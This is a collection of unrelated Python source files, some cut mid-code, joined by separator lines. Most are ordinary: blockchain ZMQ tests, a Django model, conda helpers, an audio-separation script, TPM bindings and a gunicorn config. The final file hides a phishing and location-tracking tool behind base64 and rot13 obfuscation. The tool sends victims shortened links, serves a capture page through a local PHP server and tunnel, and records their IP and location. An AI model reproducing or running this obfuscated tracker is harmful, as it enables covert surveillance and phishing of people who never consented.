BM_TEMPLATE = 'BoneMorph,"モーフ1","b01",0,10,0,0,0,0'
BMT = BM_TEMPLATE.split(',')
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
morph_name = quote(config['METER_MORPH_NAME']).format(band)
MT[1] = morph_name
print(','.join(MT))
BMT[1] = morph_name
BMT[2] = quote(config['METER_BONE_NAME']).format(band)
BMT[4] = str(config['BAR_HEIGHT'])
print(','.join(BMT))
MM_TEMPLATE = 'MaterialMorph,"0","band0",1,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0'
MMT = MM_TEMPLATE.split(',')
for band in range(n_bands):
morph_name = quote(config['VIEW_MORPH_NAME']).format(band)
MT[1] = morph_name
MT[4] = '8'
print(','.join(MT))
MMT[1] = morph_name
MMT[2] = '"band{0}"'.format(band)
print(','.join(MMT))
def print_nodes(config):
print('Node,"Root","Root"')
print('NodeItem,"Root",0,"センター"')
print('Node,"表情","Exp"')
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
print(
('NodeItem, "表情", 1, ' + quote(config['METER_MORPH_NAME']))
.format(band))
for band in range(n_bands):
print(
('NodeItem, "表情", 1, ' + quote(config['VIEW_MORPH_NAME']))
.format(band))
print('Node,"bands",""')
print('NodeItem,"bands",0,"bands_root"')
for band in range(n_bands):
print(
('NodeItem, "bands", 0, ' + quote(config['METER_BONE_NAME']))
.format(band))
if __name__ == '__main__':
functions = [print_header, print_model_info, print_vertexes,
print_materials, print_bones, print_morph, print_nodes]
fp = open(sys.argv[1], 'r', encoding='utf-8')
config = json.load(fp)
fp.close()
for f in functions:
f(config)
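# Hedged sketch (not part of the original file) of the JSON config this script
# reads from sys.argv[1]. The keys are exactly the ones accessed above; the
# concrete names, numbers and band table are made-up placeholders.
#
# {
#   "METER_MODEL_NAME": "spectrum meter",
#   "BANDS": "8band",
#   "BAND_DEFS": {"8band": [[63, 125, 250, 500, 1000, 2000, 4000, 8000]]},
#   "BAR_WIDTH": 2.0,
#   "BAR_SPACE": 0.2,
#   "BAR_HEIGHT": 10.0,
#   "BAR_RGB": [0.2, 0.8, 1.0],
#   "BAR_TRANSPARENCY": 0.8,
#   "METER_BONE_NAME": "meter{0}",
#   "METER_MORPH_NAME": "meter{0}",
#   "VIEW_MORPH_NAME": "view{0}"
# }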
|
py | 7dfd150e3112ac6a30079397d6a028afac417d6f | #!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test ZMQ interface
#
from test_framework.test_framework import RavenDarkTestFramework
from test_framework.util import *
import zmq
import binascii
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
class ZMQTest (RavenDarkTestFramework):
port = 28332
def setup_nodes(self):
self.zmqContext = zmq.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashblock")
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % self.port)
return start_nodes(4, self.options.tmpdir, extra_args=[
['-zmqpubhashtx=tcp://127.0.0.1:'+str(self.port), '-zmqpubhashblock=tcp://127.0.0.1:'+str(self.port)],
[],
[],
[]
])
def run_test(self):
self.sync_all()
genhashes = self.nodes[0].generate(1)
self.sync_all()
print "listen..."
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
blkhash = bytes_to_hex_str(body)
assert_equal(genhashes[0], blkhash) #blockhash from generate must be equal to the hash received over zmq
n = 10
genhashes = self.nodes[1].generate(n)
self.sync_all()
zmqHashes = []
for x in range(0,n*2):
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
if topic == b"hashblock":
zmqHashes.append(bytes_to_hex_str(body))
for x in range(0,n):
assert_equal(genhashes[x], zmqHashes[x]) #blockhash from generate must be equal to the hash received over zmq
#test tx from a second node
hashRPC = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0)
self.sync_all()
# now we should receive a zmq msg because the tx was broadcast
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
hashZMQ = ""
if topic == b"hashtx":
hashZMQ = bytes_to_hex_str(body)
        assert_equal(hashRPC, hashZMQ) #txid from sendtoaddress must be equal to the hash received over zmq
if __name__ == '__main__':
ZMQTest ().main ()
|
py | 7dfd16678fdc199cd2fb6114e3272757c5014aa7 | from django.db import models
from django.conf import settings
import os
def get_profileimg_path(instance, filename):
return os.path.join('profile_image', str(instance.accuser.pk), filename)
class Profile(models.Model):
accuser = models.OneToOneField(settings.AUTH_USER_MODEL,on_delete=models.CASCADE,)
nickname = models.CharField(max_length = 50)
bio = models.TextField(max_length = 100)
profileimg = models.ImageField(blank=True, upload_to=get_profileimg_path) |
py | 7dfd16d8c011e036778d81ac1f40a0ab904cd6b4 | """
Functions related to core conda functionality that relates to manually
installed Python packages, e.g. using "python setup.py install", or "pip".
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from io import open
import os
from os.path import isdir, isfile, join
import re
import sys
from .common.compat import itervalues, on_win
from .core.linked_data import linked_data
from .misc import rel_path
from .models.dist import Dist
def get_site_packages_dir(installed_pkgs):
for info in itervalues(installed_pkgs):
if info['name'] == 'python':
if on_win:
stdlib_dir = 'Lib'
else:
py_ver = info['version'][:3]
stdlib_dir = 'lib/python%s' % py_ver
return join(stdlib_dir, 'site-packages')
return None
def get_egg_info_files(sp_dir):
for fn in os.listdir(sp_dir):
if not fn.endswith(('.egg', '.egg-info', '.dist-info')):
continue
path = join(sp_dir, fn)
if isfile(path):
yield path
elif isdir(path):
for path2 in [join(path, 'PKG-INFO'),
join(path, 'EGG-INFO', 'PKG-INFO'),
join(path, 'METADATA')]:
if isfile(path2):
yield path2
pat = re.compile(r'(\w+):\s*(\S+)', re.I)
def parse_egg_info(path):
"""
Parse an .egg-info file and return its canonical distribution name
"""
info = {}
for line in open(path, encoding='utf-8'):
line = line.strip()
m = pat.match(line)
if m:
key = m.group(1).lower()
info[key] = m.group(2)
try:
return '%(name)s-%(version)s-<pip>' % info
except KeyError:
pass
return None
def get_egg_info(prefix, all_pkgs=False):
"""
Return a set of canonical names of all Python packages (in `prefix`),
by inspecting the .egg-info files inside site-packages.
By default, only untracked (not conda installed) .egg-info files are
considered. Setting `all_pkgs` to True changes this.
"""
installed_pkgs = linked_data(prefix)
sp_dir = get_site_packages_dir(installed_pkgs)
if sp_dir is None:
return set()
conda_files = set()
for info in itervalues(installed_pkgs):
conda_files.update(info.get('files', []))
res = set()
for path in get_egg_info_files(join(prefix, sp_dir)):
f = rel_path(prefix, path)
if all_pkgs or f not in conda_files:
try:
dist = parse_egg_info(path)
except UnicodeDecodeError:
dist = None
if dist:
res.add(Dist(dist))
return res
if __name__ == '__main__':
from pprint import pprint
pprint(get_egg_info(sys.prefix))
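# Hedged illustration (not in the original module) of what parse_egg_info()
# extracts: given a PKG-INFO/METADATA file containing lines such as
#
#     Name: requests
#     Version: 2.18.4
#
# the regex above collects {'name': 'requests', 'version': '2.18.4'} and the
# function returns the canonical string 'requests-2.18.4-<pip>'. The package
# name and version are examples only.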
|
py | 7dfd174974e5687d75d8594524d8420924e95c03 | Numero = int(input(':Que termo deseja encontrar: '))
ultimo = 1
penultimo = 1
if (Numero == 1) or (Numero == 2):
print('1')
else:
for count in range(2,Numero):
termo = ultimo + penultimo
penultimo = ultimo
ultimo = termo
print(termo)
|
py | 7dfd1816e134bb323053d9b7710aa8d4242c6728 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import absolute_import, division
import re
from mo_future import first
from mo_dots import Data, coalesce, is_data, listwrap, wrap_leaves
from mo_logs import Log, strings
from mo_times.dates import Date
GLOBALS = {
"true": True,
"false": False,
"null": None,
"EMPTY_DICT": {},
"coalesce": coalesce,
"listwrap": listwrap,
"Date": Date,
"Log": Log,
"Data": Data,
"re": re,
"wrap_leaves": wrap_leaves,
"is_data": is_data,
"first": first
}
def compile_expression(source, function_name="output"):
"""
THIS FUNCTION IS ON ITS OWN FOR MINIMAL GLOBAL NAMESPACE
:param source: PYTHON SOURCE CODE
:param function_name: OPTIONAL NAME TO GIVE TO OUTPUT FUNCTION
:return: PYTHON FUNCTION
"""
fake_locals = {}
try:
exec(
(
"def " + function_name + "(row, rownum=None, rows=None):\n" +
" _source = " + strings.quote(source) + "\n" +
" try:\n" +
" return " + source + "\n" +
" except Exception as e:\n" +
" Log.error(u'Problem with dynamic function {{func|quote}}', func=_source, cause=e)\n"
),
GLOBALS,
fake_locals,
)
except Exception as e:
Log.error(u"Bad source: {{source}}", source=source, cause=e)
    return fake_locals[function_name]
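# Hedged usage sketch (not part of the original module): compile_expression()
# turns a Python expression string into a callable taking (row, rownum, rows).
# The expression and row used below are illustrative only.
def _example_compile_expression():
    get_name = compile_expression("row['name']")
    return get_name({"name": "example"})  # -> "example"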
|
py | 7dfd18fd052a7940e41576e52c4b043ba022b4fb | from django.conf import settings
from mapentity.registry import registry
from . import models
app_name = 'maintenance'
urlpatterns = registry.register(models.Intervention, menu=settings.INTERVENTION_MODEL_ENABLED)
urlpatterns += registry.register(models.Project, menu=settings.PROJECT_MODEL_ENABLED)
|
py | 7dfd1900f3eba800e28a87a5aa6a931b20f24d69 | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
MSS Inference code using D3Net.
'''
import os
import argparse
import yaml
import numpy as np
import nnabla as nn
from nnabla.ext_utils import get_extension_context
from util import model_separate, save_stft_wav, generate_data
from filter import apply_mwf
from args import get_inference_args
def run_separation(args, fft_size=4096, hop_size=1024, n_channels=2, apply_mwf_flag=True, ch_flip_average=False):
# Set NNabla extention
ctx = get_extension_context(args.context)
nn.set_default_context(ctx)
for i, input_file in enumerate(args.inputs):
sample_rate, inp_stft = generate_data(
input_file, fft_size, hop_size, n_channels)
print(f"{i+1} / {len(args.inputs)} : {input_file}")
out_stfts = {}
inp_stft_contiguous = np.abs(np.ascontiguousarray(inp_stft))
for target in args.targets:
# Load the model weights for corresponding target
nn.load_parameters(f"{os.path.join(args.model_dir, target)}.h5")
with open(f"./configs/{target}.yaml") as file:
# Load target specific Hyper parameters
hparams = yaml.load(file, Loader=yaml.FullLoader)
with nn.parameter_scope(target):
out_sep = model_separate(
inp_stft_contiguous, hparams, ch_flip_average=ch_flip_average)
out_stfts[target] = out_sep * np.exp(1j * np.angle(inp_stft))
if apply_mwf_flag:
out_stfts = apply_mwf(out_stfts, inp_stft)
sub_dir_name = ''
output_subdir = args.out_dir + sub_dir_name
output_subdir = os.path.join(
output_subdir, os.path.splitext(os.path.basename(input_file))[0])
if not os.path.exists(output_subdir):
os.makedirs(output_subdir)
out = {}
for target in args.targets:
out[target] = save_stft_wav(out_stfts[target], hop_size, sample_rate, output_subdir + '/' +
target + '.wav', samplewidth=2)
if __name__ == '__main__':
run_separation(
get_inference_args(),
fft_size=4096,
hop_size=1024,
n_channels=2,
apply_mwf_flag=True,
ch_flip_average=True
)
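# Hedged note (not part of the original file): run_separation() only relies on
# a handful of attributes of the argparse namespace returned by
# get_inference_args() -- args.context, args.inputs, args.targets,
# args.model_dir and args.out_dir are the ones read above. The actual flag
# spellings live in args.py and are not shown here.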
|
py | 7dfd192b5715119b37e0b031a333726a135786a7 | """
SPDX-License-Identifier: BSD-2
"""
from ._libtpm2_pytss import ffi
from .utils import _chkrc
class TCTI:
def __init__(self, ctx):
self._v1 = ffi.cast("TSS2_TCTI_CONTEXT_COMMON_V1 *", ctx)
if self._v1.version == 2:
self._v2 = ffi.cast("TSS2_TCTI_CONTEXT_COMMON_V2 *", ctx)
else:
self._v2 = None
self._ctx = ctx
@property
def _tcti_context(self):
return self._ctx
@property
def magic(self):
return self._v1.magic
@property
def version(self):
return self._v1.version
def transmit(self, command):
cmd = ffi.new("uint8_t []", command)
clen = len(command)
_chkrc(self._v1.transmit(self._ctx, clen, cmd))
def receive(self, size=-1, timeout=-1):
if size == -1:
size = 4096
resp = ffi.new("uint8_t []", b"\x00" * size)
rsize = ffi.new("size_t *", size)
_chkrc(self._v1.receive(self._ctx, rsize, resp, timeout))
return bytes(ffi.buffer(resp, rsize[0]))
def finalize(self):
self._v1.finalize(self._ctx)
def cancel(self):
_chkrc(self._v1.cancel(self._ctx))
def get_poll_handles(self):
nhandles = ffi.new("size_t *", 0)
_chkrc(self._v1.getPollHandles(self._ctx, ffi.NULL, nhandles))
if nhandles[0] == 0:
return ()
handles = ffi.new("TSS2_TCTI_POLL_HANDLE []", nhandles[0])
_chkrc(self._v1.getPollHandles(self._ctx, handles, nhandles))
rh = []
for i in range(0, nhandles[0]):
rh.append(handles[i])
return tuple(rh)
def set_locality(self, locality):
_chkrc(self._v1.setLocality(self._ctx, locality))
def make_sticky(self, handle, sticky):
if self._v2 is None:
raise RuntimeError("unsupported by TCTI API version")
hptr = ffi.new("TPM2_HANDLE *", handle)
_chkrc(self._v2.makeSticky(self._ctx, hptr, sticky))
return hptr[0]
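# Hedged usage sketch (not part of the original module). A concrete
# TSS2_TCTI_CONTEXT pointer has to come from elsewhere (for example a loaded
# TCTI module); "ctx" below is a placeholder for such a pointer, and the bytes
# are an arbitrary example command, not a meaningful TPM command.
def _example_roundtrip(ctx):
    tcti = TCTI(ctx)
    tcti.transmit(b"\x80\x01\x00\x00\x00\x0a\x00\x00\x01\x7a")
    return tcti.receive(timeout=1000)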
|
py | 7dfd197e98a1e6a4cb52d4b71f6213fa09463c62 | bind = '0.0.0.0:8084'
workers = 4
worker_class = 'gevent'
worker_connections = 1000
max_requests = int(workers * worker_connections)
keepalive = 2
max_requests_jitter = 5
timeout = 30
errorlog = '-' |
py | 7dfd19854be804f883ea2e92ecf5bab0dc42d24e | import base64, codecs
magic = 'CgppbXBvcnQgcmFuZG9tCmltcG9ydCBvcywgc3lzCmltcG9ydCByYW5kb20KZnJvbSB0aW1lIGltcG9ydCBzbGVlcAppbXBvcnQganNvbgppbXBvcnQgYXJncGFyc2UKaW1wb3J0IHJlcXVlc3RzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHN1YnAKaW1wb3J0IGNzdgppbXBvcnQgdGltZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgoKI2NvbG91cnMgLS0tLS0tLS0tLS0tY29kZSdzLS0tIApyID0gIlwwMzNbMTszMW0iCmcgPSAiXDAzM1sxOzMybSIKeSA9ICJcMDMzWzE7MzNtIgpiID0gIlwwMzNbMTszNG0iCmQgPSAiXDAzM1syOzM3bSIKUiA9ICJcMDMzWzE7NDFtIgpZID0gIlwwMzNbMTs0M20iCkIgPSAiXDAzM1sxOzQ0bSIKdyA9ICJcMDMzWzE7MzdtIgpSID0gJ1wwMzNbMzFtJyAjIHJlZApHID0gJ1wwMzNbMzJtJyAjIGdyZWVuCkMgPSAnXDAzM1szNm0nICMgY3lhbgpXID0gJ1wwMzNbMG0nICAjIHdoaXRlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCnBhcnNlciA9IGFyZ3BhcnNlLkFyZ3VtZW50UGFyc2VyKCkKcGFyc2VyLmFkZF9hcmd1bWVudCgnLXMnLCAnLS1zdWJkb21haW4nLCBoZWxwPSdQcm92aWRlIFN1YmRvbWFpbiBmb3IgU2VydmVvIFVSTCAoIE9wdGlvbmFsICknKQpwYXJzZXIuYWRkX2FyZ3VtZW50KCctaycsICctLWttbCcsIGhlbHA9J1Byb3ZpZGUgS01MIEZpbGVuYW1lICggT3B0aW9uYWwgKScpCnBhcnNlci5hZGRfYXJndW1lbnQoJy10JywgJy0tdHVubmVsJywgaGVscD0nU3BlY2lmeSBUdW5uZWwgTW9kZSBbIEF2YWlsYWJsZSA6IG1hbnVhbCBdJykKcGFyc2VyLmFkZF9hcmd1bWVudCgnLXAnLCAnLS1wb3J0JywgdHlwZT1pbnQsIGRlZmF1bHQ9ODA4MCwgaGVscD0nUG9ydCBmb3IgV2ViIFNlcnZlciBbIERlZmF1bHQgOiA4MDgwIF0nKQoKYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKc3ViZG9tID0gYXJncy5zdWJkb21haW4Ka21sX2ZuYW1lID0gYXJncy5rbWwKdHVubmVsX21vZGUgPSBhcmdzLnR1bm5lbApwb3J0ID0gYXJncy5wb3J0Cgpyb3cgPSBbXQppbmZvID0gJycKcmVzdWx0ID0gJycKCiNzY3JpcHQgYmFubmVyLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCgojQUxMIGNvbW1lbnQgYXJlIHVuZGVyIHRlc3RlZCBzbyBpZ25vcmUgaGltIHdoZW4gaSB1cGRhdGUgaXQgdGhlbiBpdHMgaGVscCBtZSBvdXQgdG8gdGhpbmsgYmV0dGVyIHNvIHRoYW5rcyBmb3IgdXNpbmcgdG9vbAojd2Ugd2lsbCB1cGRhdGUgc29vbgojd2Ugd2lsbCBhZGQgc3Bvb2ZpbmcgeCBib21iaW5nIAojc29vbgojYnkgdmFpbXBpZXIgcml0aWsKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCmRlZiBiYW5uZXIoKToKICAgIHByaW50KHcrZCsiICAgICAgLCwgICAgICAgICAgICAgICAgLCwiKQogICAgcHJpbnQodytkKyIgICAgKCgoKCggICAgICAgICAgICAgICkpKSkpIikKICAgIHByaW50KHcrZCsiICAgKCgoKCgoICAgICAgICAgICAgICApKSkpKSkiKQogICAgcHJpbnQodytkKyIgICAoKCgoKCggICAgICAgICAgICAgICkpKSkpKSIpCiAgICBwcmludCh3K2QrIiAgICAoKCgoKCIrdytiKyIsckBAQEBAQEBAQEBlLCIrdytkKyIpKSkpKSIpCiAgICBwcmludCh3K2QrIiAgICAgICgoKCIrdytiKyJAQEBAQEBAQEBAQEBAQEBAIit3K2QrIikpKSAgICAiK3crYisiVmFpbVNhbWF5IC0gdmVyc2lvbiAxLjAiKQogICAgcHJpbnQodytiKyIgICAgICBcQEAvIityKyIsOjo6LCIrdytiKyJcLyIrcisiLDo6OiwiK3crYisiXEBAICAgICAgICIrdysiLS0tLS0tLS0tLS0tLS0tLS0tIikKICAgIHByaW50KHcrYisiICAgICAvQEBAfCIrcisiOjo6OjoiK3crYisifHwiK3IrIjo6Ojo6Iit3K2IrInxAQEBcXCAgICAgIityKyJJbnN0YWdyYW0iK3crIiA6ICIreSsiQHZhaW1waWVyX3JpdGlrIHggQF92aWxlbl9iaG9pIikKICAgIHByaW50KHcrYisiICAgIC8gQEBAXFwiK3IrIic6OjonIit3K2IrIi9cXCIrcisiJzo6OiciK3crYisiL0BAQCBcXCAgICAiK3cpCiAgICBwcmludCh3K2IrIiAgIC8gIC9AQEBAQEBALy9cXFxAQEBAQEBAXCAgXFwgICAiK2crIlRoZSBhdXRob3IgaXMgbm90IHJlc3BvbnNpYmxlIikKICAgIHByaW50KHcrYisiICAoICAvICAnQEBAQEA9PT09QEBAQEAnICBcICApICAiK2crImZvciBhbnkgaXNzdWVzIG9yIGRhbWFnZSIpCiAgICBwcmludCh3K2IrIiAgIFwoICAgICAvICAgICAgICAgIFwgICAgICkvICAgIitnKyJjYXVzZWQgYnkgdGhpcyBwcm9ncmFtIikKICAgIHByaW50KHcrYisiICAgICBcICAgKCAgICAgICAgICAgICkgICAvIikKICAgIHByaW50KHcrYisiICAgICAgICAgIFwgICAgICAgICAgLyIrdykKCSAgICAKCgpkZWYgcmFuZG9tbGluaygpOgoJIiIiCglmb3IgbGV0dGVyIGluIHN0cmluZzoKCSAgc2xlZXAoMC4wMSkgCgkgIHN5cy5zdGRvdXQud3JpdGUobGV0dGVyKQoJICBzeXMuc3Rkb3V0LmZsdXNoKCkKCXByaW50KCJcbiIpCgkiIiIKCV92Yl8gPSBbCgoJJ2h0dHBzOi8vYml0Lmx5LzN6NzFCYlgnLAoJJ2h0dHBzOi8vY3V0dC5seS9KVzBSMWZPJywKCSdodHRwczovL3Nob3J0dXJsLmF0L2NobkNJJywKCSdodHRwczovL3JiLmd5L2cyOWM5cCcsCgknaHR0cHM6Ly90aW55dXJsLmNvbS9WYWltU2FtYXknLAoJJ2h0dHBzOi8vc2hyZWtpcy5saWZlL0o1ODQ1Vi5naWYnLAoJJ2h0dH
BzOi8vcmVicmFuZC5seS9xZjRmZjkwJwoKCV0KCgoJcHJpbnQocisi4pSU4pSAIit3KyJbIV0gU2VuZCB0aGlzIExpbmsgdG8geW91ciB2aWNpdG0gOiAiK3krcmFuZG9tLmNob2ljZShfdmJfKSkKCWJhY2s9aW5wdXQocisiLi7ilJTilIAiK3crIlwwMzNbMTszN21CYWNrIFsgeSAvIG4gXTogIityKQoJaWYgYmFjaz09J3knIG9yIGJhY2s9PSdZJzoKCQlvcy5zeXN0ZW0oImNsZWFyIikKCQlpcCgpCglpZiBiYWNrPT0nbicgb3IgYmFjaz09J04nOgoJCXN5cy5leGl0KCkKCWVsc2U6CgkJYmFja2llKCkKCgoKCmRlZiBieWUoKToKCW9zLnN5c3RlbSgiY2xlYXIi'
love = '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'
